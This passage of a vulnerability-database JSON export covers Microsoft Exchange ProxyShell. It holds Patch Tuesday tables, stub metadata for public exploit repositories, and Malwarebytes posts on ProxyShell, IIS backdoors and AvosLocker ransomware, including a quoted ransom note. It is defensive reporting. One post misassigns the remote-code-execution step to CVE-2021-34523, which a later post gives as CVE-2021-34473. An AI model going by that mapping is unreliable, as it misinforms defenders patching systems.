Vulnerability | No | No | 7.8 | No \n[CVE-2021-31190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31190>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-28479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28479>) | Windows CSC Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-28465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28465>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>) | HTTP Protocol Stack Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2020-24588](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-24588>) | Windows Wireless Networking Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2020-26144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26144>) | Windows Wireless Networking Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2020-24587](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-24587>) | Windows Wireless Networking Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-31193](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31193>) | Windows SSDP Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31186>) | Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability | No | No | 7.4 | Yes \n[CVE-2021-31188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31188>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31194](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31194>) | OLE Automation Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-31184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31184>) | Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31182>) | Microsoft Bluetooth Driver Spoofing Vulnerability | No | No | 7.1 | No \n[CVE-2021-28476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28476>) | Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n \n## Windows Microsoft Office ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-28455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28455>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-05-11T23:44:00", "type": "rapid7blog", "title": "Patch Tuesday - May 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24587", "CVE-2020-24588", "CVE-2020-26144", "CVE-2021-26418", "CVE-2021-26419", "CVE-2021-26421", "CVE-2021-26422", "CVE-2021-27068", "CVE-2021-28455", "CVE-2021-28461", "CVE-2021-28465", "CVE-2021-28474", "CVE-2021-28476", "CVE-2021-28478", "CVE-2021-28479", "CVE-2021-31165", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31168", "CVE-2021-31169", "CVE-2021-31170", "CVE-2021-31171", "CVE-2021-31172", "CVE-2021-31173", "CVE-2021-31174", "CVE-2021-31175", "CVE-2021-31176", "CVE-2021-31177", "CVE-2021-31178", "CVE-2021-31179", "CVE-2021-31180", "CVE-2021-31181", "CVE-2021-31182", "CVE-2021-31184", "CVE-2021-31185", "CVE-2021-31186", "CVE-2021-31187", "CVE-2021-31188", "CVE-2021-31190", "CVE-2021-31191", "CVE-2021-31192", "CVE-2021-31193", "CVE-2021-31194", "CVE-2021-31195", "CVE-2021-31198", "CVE-2021-31200", "CVE-2021-31204", "CVE-2021-31205", "CVE-2021-31207", "CVE-2021-31208", "CVE-2021-31209", "CVE-2021-31211", "CVE-2021-31213", "CVE-2021-31214", "CVE-2021-31936"], "modified": "2021-05-11T23:44:00", "id": "RAPID7BLOG:05A653A5E863B78EDD56FD74F059E02E", "href": "https://blog.rapid7.com/2021/05/11/patch-tuesday-may-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "malwarebytes": [{"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) 